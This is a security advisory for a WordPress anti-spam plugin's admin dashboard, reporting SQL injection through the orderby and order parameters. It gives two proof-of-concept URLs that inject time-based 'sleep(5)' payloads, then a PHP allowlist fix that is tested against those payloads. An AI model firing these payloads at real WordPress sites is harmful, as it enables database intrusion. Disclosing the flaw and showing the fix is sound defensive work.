The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection.
With at least one IP in the “Blocked IPs” list:
https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=1%20and%20sleep(5)
https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=date_added&order=+and+sleep(5)
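
One way to close this class of bug, shown as an added example that is not the plugin's own code: pick the ORDER BY column and direction from fixed allowlists instead of passing the request values into the query. The function name and every column other than date_added are hypothetical.

```php
<?php
// Added example, not the plugin's code. Column names other than
// date_added are hypothetical.

/**
 * Build an ORDER BY clause from untrusted request parameters.
 * Anything not on the allowlist falls back to a fixed default.
 */
function build_order_clause(array $request, array $allowed_columns, string $default_column): string
{
    // Reject non-string input (for example orderby[]=x arrives as an array).
    $orderby = isset($request['orderby']) && is_string($request['orderby'])
        ? $request['orderby'] : '';
    $order = isset($request['order']) && is_string($request['order'])
        ? strtoupper(trim($request['order'])) : '';

    // A value placeholder does not protect a column name or the ASC/DESC
    // keyword, so the column is chosen by strict comparison against a fixed list.
    if (!in_array($orderby, $allowed_columns, true)) {
        $orderby = $default_column;
    }
    // Direction is one of two literals; anything else becomes DESC.
    if ($order !== 'ASC' && $order !== 'DESC') {
        $order = 'DESC';
    }
    return sprintf('ORDER BY `%s` %s', $orderby, $order);
}

$allowed = ['date_added', 'user_ip', 'blocked_type']; // last two are hypothetical

// Constructed inputs: the two request shapes above after URL decoding,
// one legitimate sort, and one array-typed parameter.
$samples = [
    ['orderby' => '1 and sleep(5)'],
    ['orderby' => 'date_added', 'order' => ' and sleep(5)'],
    ['orderby' => 'user_ip', 'order' => 'asc'],
    ['orderby' => ['nested']],
];

foreach ($samples as $sample) {
    echo build_order_clause($sample, $allowed, 'date_added'), PHP_EOL;
}
```

Only the third sample changes the sort; the other three resolve to the default column and direction, so no request text reaches the SQL string.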